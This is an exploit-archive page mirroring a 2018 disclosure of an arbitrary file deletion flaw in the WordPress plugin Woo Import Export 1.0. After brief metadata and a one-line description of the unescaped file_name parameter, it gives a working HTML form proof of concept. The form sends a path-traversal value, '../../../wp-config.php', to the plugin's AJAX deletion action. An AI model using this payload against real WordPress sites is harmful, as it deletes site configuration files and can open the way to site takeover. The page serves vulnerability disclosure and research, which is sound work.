Advertisement






WordPress Woo Import Export 1.0 Arbitrary File Deletion

CVE Category Price Severity
N/A CWE-22 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2018-04-26
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040212

Below is a copy:

WordPress Woo Import Export 1.0 Arbitrary File Deletion
<!--
# Exploit Title:  Plugin to Wordpress Woo Import Export 1.0 RCE a Unlink
# Date: 24/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version:  1.0
# Tested on: Ubuntu 16.1
 
 
1 - Description
 
 
   - Type user access: any user registered.
         - $_POST['file_name'] is not escaped.
 
Article:
*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/
 
Video:
 
*https://www.youtube.com/watch?v=pImtGeecdCk
 
2. Proof of Concept
-->
 
<form method="post"
action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
   <input type="text" name="file_name" value="../../../wp-config.php">
   <input type="text" name="log_id" value="aaa">
   <input type="submit">
</form>
 
<!--
   - Date Discovery : *11/25/2017*
      - Date Vendor Contact : *12/29/2017*
      - Date Publish : 24/04/2018
      - Date Resolution :
-->


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum